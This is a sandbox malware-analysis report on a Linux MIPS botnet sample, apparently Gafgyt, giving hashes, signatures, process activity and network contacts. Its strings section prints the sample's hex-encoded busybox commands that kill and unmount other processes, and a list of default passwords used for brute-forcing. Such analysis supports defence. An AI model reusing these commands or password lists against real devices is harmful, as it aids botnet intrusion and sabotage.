Edit tour

Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:mpsl.elf
Analysis ID:1660217
MD5:5abd0891a6ecdfb5ef8fbeb1a4fc008b
SHA1:2c72436f58832dd88c9cff1832834f02f7d4ce1c
SHA256:7580c54b9b7ee808e4b2d097b9f228b42852e8d6173cb7833e610cbd4146b122
Tags:elfuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Sample reads /proc/mounts (often used for finding a writable filesystem)
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1660217
Start date and time:2025-04-09 06:00:44 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 8s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mpsl.elf
Detection:MAL
Classification:mal52.troj.linELF@0/2@0/0
Command:/tmp/mpsl.elf
PID:6259
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • mpsl.elf (PID: 6259, Parent: 6183, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf
    • mpsl.elf New Fork (PID: 6264, Parent: 6259)
  • dash New Fork (PID: 6323, Parent: 4331)
  • rm (PID: 6323, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
  • dash New Fork (PID: 6324, Parent: 4331)
  • rm (PID: 6324, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: mpsl.elfReversingLabs: Detection: 33%
Source: mpsl.elfVirustotal: Detection: 37%Perma Link
Source: /tmp/mpsl.elf (PID: 6264)Socket: 127.0.0.1:22448
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39258
Source: unknownNetwork traffic detected: HTTP traffic on port 39258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing potential weak password found: 12345
Source: Initial sampleString containing potential weak password found: 54321
Source: Initial sampleString containing potential weak password found: 654321
Source: Initial sampleString containing potential weak password found: admin1234
Source: Initial sampleString containing potential weak password found: administrator
Source: Initial sampleString containing potential weak password found: supervisor
Source: Initial sampleString containing potential weak password found: password
Source: Initial sampleString containing potential weak password found: default
Source: Initial sampleString containing potential weak password found: guest
Source: Initial sampleString containing potential weak password found: service
Source: Initial sampleString containing potential weak password found: support
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.troj.linELF@0/2@0/0

Persistence and Installation Behavior

barindex
Source: /tmp/mpsl.elf (PID: 6259)File: /proc/6259/mountsJump to behavior
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1582/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1582/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/3088/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/230/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/110/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/231/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/111/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/232/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1579/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1579/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/112/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/233/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1699/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1699/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/113/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/234/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1335/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1698/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1698/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/114/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/235/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1334/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1576/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2302/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2302/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/115/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/236/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/116/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/237/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/117/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/118/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/910/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/119/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/912/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/10/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2307/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2307/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/11/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/918/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/12/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/13/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/6243/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/14/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/15/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/16/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/6244/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/17/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/18/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/4740/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1594/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1594/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/120/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/121/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1349/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1349/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/122/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/243/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/123/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/124/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/3/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/4/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/125/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/126/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1344/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1465/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1586/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1586/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/127/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/6/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/248/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/128/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/249/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1463/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/800/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/9/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/801/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/20/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/21/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1900/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/22/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/23/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/24/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/25/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/26/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/27/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/28/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/29/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/491/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/250/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/130/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/251/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/252/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/132/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/253/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/254/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/255/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/256/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1599/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/257/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1477/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1477/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/379/maps
Source: /usr/bin/dash (PID: 6323)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
Source: /usr/bin/dash (PID: 6324)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
Source: /tmp/mpsl.elf (PID: 6259)Queries kernel information via 'uname':
Source: mpsl.elf, 6259.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmp, mpsl.elf, 6264.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmpBinary or memory string: 1Zm6vnZ5U4mf8vApyWcDwXR44ZAkzslsN1!a1gCWFxqAHsFWFMWRHVDR44!!a1gCWFxqAHsFWFMWT3YA)D!!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
Source: mpsl.elf, 6259.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmpBinary or memory string: /tmp/qemu-open.98URIt
Source: mpsl.elf, 6259.1.0000561c9637d000.0000561c96424000.rw-.sdmp, mpsl.elf, 6264.1.0000561c9637d000.0000561c96424000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: mpsl.elf, 6259.1.0000561c9637d000.0000561c96424000.rw-.sdmp, mpsl.elf, 6264.1.0000561c9637d000.0000561c96424000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/mipsel
Source: mpsl.elf, 6264.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmpBinary or memory string: vmware
Source: mpsl.elf, 6259.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmp, mpsl.elf, 6264.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmpBinary or memory string: qemu-arm
Source: mpsl.elf, 6264.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmpBinary or memory string: Vqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: mpsl.elf, 6259.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, mpsl.elf, 6264.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
Source: mpsl.elf, 6259.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.98URIt\
Source: mpsl.elf, 6259.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, mpsl.elf, 6264.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
Source: mpsl.elf, 6264.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
File Deletion
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit1
Brute Force
1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1660217 Sample: mpsl.elf Startdate: 09/04/2025 Architecture: LINUX Score: 52 16 109.202.202.202, 80 INIT7CH Switzerland 2->16 18 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->18 20 2 other IPs or domains 2->20 22 Multi AV Scanner detection for submitted file 2->22 7 mpsl.elf 2->7         started        10 dash rm 2->10         started        12 dash rm 2->12         started        signatures3 process4 signatures5 24 Sample reads /proc/mounts (often used for finding a writable filesystem) 7->24 14 mpsl.elf 7->14         started        process6

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
mpsl.elf33%ReversingLabsLinux.Backdoor.Gafgyt
mpsl.elf38%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
34.249.145.219
unknownUnited States
16509AMAZON-02USfalse
109.202.202.202
unknownSwitzerland
13030INIT7CHfalse
91.189.91.43
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
91.189.91.42
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
No context
No context
No context
No context
No context
Process:/tmp/mpsl.elf
File Type:ASCII text
Category:dropped
Size (bytes):362
Entropy (8bit):3.7946852578785095
Encrypted:false
SSDEEP:6:URA/tIgDF6Fk7CY/VmsDF6FfKyVPj/VKAvVVyAb/3hM/V+4D/VH:IA/fkGfkxKyyaVIAbRMfF
MD5:8626E24C6C375B0C8466940FC112645A
SHA1:2136BA9FFB8B60A4928B6452CA8D1CD07ECA49F7
SHA-256:98B805DF166243F79DA32E0DE9EEA74C1AEDBFA8B6DD8FA388DE53B74F3A7D40
SHA-512:A497A7DA93E453F683100984BBC1B17516A6CD88206304AD36741ABF65D15683FB7E2F896C0EED4FBEFAB29C4ED81F49A8416F5985757645AE65E3264F3E4C71
Malicious:false
Reputation:low
Preview:400000-42e000 r-xp 00000000 fd:00 531606 /tmp/mpsl.elf.43e000-43f000 rw-p 0002e000 fd:00 531606 /tmp/mpsl.elf.43f000-445000 rw-p 00000000 00:00 0 .7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.7f7ff000-7f800000 ---p 00000000 00:00 0 .7f800000-80000000 rw-p 00000000 00:00 0 [stack].
Process:/tmp/mpsl.elf
File Type:ASCII text
Category:dropped
Size (bytes):362
Entropy (8bit):3.7946852578785095
Encrypted:false
SSDEEP:6:URA/tIgDF6Fk7CY/VmsDF6FfKyVPj/VKAvVVyAb/3hM/V+4D/VH:IA/fkGfkxKyyaVIAbRMfF
MD5:8626E24C6C375B0C8466940FC112645A
SHA1:2136BA9FFB8B60A4928B6452CA8D1CD07ECA49F7
SHA-256:98B805DF166243F79DA32E0DE9EEA74C1AEDBFA8B6DD8FA388DE53B74F3A7D40
SHA-512:A497A7DA93E453F683100984BBC1B17516A6CD88206304AD36741ABF65D15683FB7E2F896C0EED4FBEFAB29C4ED81F49A8416F5985757645AE65E3264F3E4C71
Malicious:false
Reputation:low
Preview:400000-42e000 r-xp 00000000 fd:00 531606 /tmp/mpsl.elf.43e000-43f000 rw-p 0002e000 fd:00 531606 /tmp/mpsl.elf.43f000-445000 rw-p 00000000 00:00 0 .7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.7f7ff000-7f800000 ---p 00000000 00:00 0 .7f800000-80000000 rw-p 00000000 00:00 0 [stack].
File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):5.143485756645029
TrID:
  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:mpsl.elf
File size:190'848 bytes
MD5:5abd0891a6ecdfb5ef8fbeb1a4fc008b
SHA1:2c72436f58832dd88c9cff1832834f02f7d4ce1c
SHA256:7580c54b9b7ee808e4b2d097b9f228b42852e8d6173cb7833e610cbd4146b122
SHA512:ab91740ffc077b5808fe9ed7280fb1fde5aaef68dd934a0637ca6aedafe771bb2cd04dac23c8dbd7acda1a031f052587af74c0f1b3734ad46cc0df5bc515a199
SSDEEP:1536:cchMHxAJL5x1Yu4o2tIMOrMiNHbDrVmPHY0NyakOtsElddTlnOArV:cchaxAJdfj4EWY0BBd5
TLSH:BD148486BF503EFFC85ECD3751A4CA0A129C895D5294BFB66A34E414B68B10E99C3C9C
File Content Preview:.ELF....................`.@.4...x.......4. ...(...............@...@.`...`...............<...<.C.<.C......O..........Q.td...............................'...................<xa.'!.............9'.. ........................<Ha.'!... .........9'.. ............

ELF header

Class:ELF32
Data:2's complement, little endian
Version:1 (current)
Machine:MIPS R3000
Version Number:0x1
Type:EXEC (Executable file)
OS/ABI:UNIX - System V
ABI Version:0
Entry Point Address:0x400260
Flags:0x1007
ELF Header Size:52
Program Header Offset:52
Program Header Size:32
Number of Program Headers:3
Section Header Offset:190328
Section Header Size:40
Number of Section Headers:13
Header String Table Index:12
NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
NULL0x00x00x00x00x0000
.initPROGBITS0x4000940x940x7c0x00x6AX004
.textPROGBITS0x4001100x1100x2ab700x00x6AX0016
.finiPROGBITS0x42ac800x2ac800x4c0x00x6AX004
.rodataPROGBITS0x42acd00x2acd00x2b900x00x2A0016
.ctorsPROGBITS0x43e03c0x2e03c0x80x00x3WA004
.dtorsPROGBITS0x43e0440x2e0440x80x00x3WA004
.data.rel.roPROGBITS0x43e0500x2e0500x1080x00x3WA004
.dataPROGBITS0x43e1600x2e1600xd00x00x3WA0016
.gotPROGBITS0x43e2300x2e2300x4f00x40x10000003WAp0016
.sbssNOBITS0x43e7200x2e7200x1c0x00x10000003WAp004
.bssNOBITS0x43e7400x2e7200x48000x00x3WA0016
.shstrtabSTRTAB0x00x2e7200x560x00x0001
TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
LOAD0x00x4000000x4000000x2d8600x2d8605.17770x5R E0x10000.init .text .fini .rodata
LOAD0x2e03c0x43e03c0x43e03c0x6e40x4f044.77610x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
  • Total Packets: 10
  • 443 (HTTPS)
  • 80 (HTTP)
TimestampSource PortDest PortSource IPDest IP
Apr 9, 2025 06:01:55.468121052 CEST43928443192.168.2.2391.189.91.42
Apr 9, 2025 06:01:56.184232950 CEST39258443192.168.2.2334.249.145.219
Apr 9, 2025 06:01:56.184278965 CEST4433925834.249.145.219192.168.2.23
Apr 9, 2025 06:01:56.186703920 CEST39258443192.168.2.2334.249.145.219
Apr 9, 2025 06:01:56.186703920 CEST39258443192.168.2.2334.249.145.219
Apr 9, 2025 06:01:56.186736107 CEST4433925834.249.145.219192.168.2.23
Apr 9, 2025 06:02:01.099386930 CEST42836443192.168.2.2391.189.91.43
Apr 9, 2025 06:02:15.945324898 CEST43928443192.168.2.2391.189.91.42
Apr 9, 2025 06:02:17.993110895 CEST4251680192.168.2.23109.202.202.202
Apr 9, 2025 06:02:28.231614113 CEST42836443192.168.2.2391.189.91.43
Apr 9, 2025 06:02:56.178708076 CEST39258443192.168.2.2334.249.145.219
Apr 9, 2025 06:02:56.224287987 CEST4433925834.249.145.219192.168.2.23
Apr 9, 2025 06:02:56.899787903 CEST43928443192.168.2.2391.189.91.42

System Behavior

Start time (UTC):04:01:52
Start date (UTC):09/04/2025
Path:/tmp/mpsl.elf
Arguments:/tmp/mpsl.elf
File size:5773336 bytes
MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9
Start time (UTC):04:01:56
Start date (UTC):09/04/2025
Path:/tmp/mpsl.elf
Arguments:-
File size:5773336 bytes
MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9
Start time (UTC):04:02:54
Start date (UTC):09/04/2025
Path:/usr/bin/dash
Arguments:-
File size:129816 bytes
MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
Start time (UTC):04:02:54
Start date (UTC):09/04/2025
Path:/usr/bin/rm
Arguments:rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
File size:72056 bytes
MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b
Start time (UTC):04:02:54
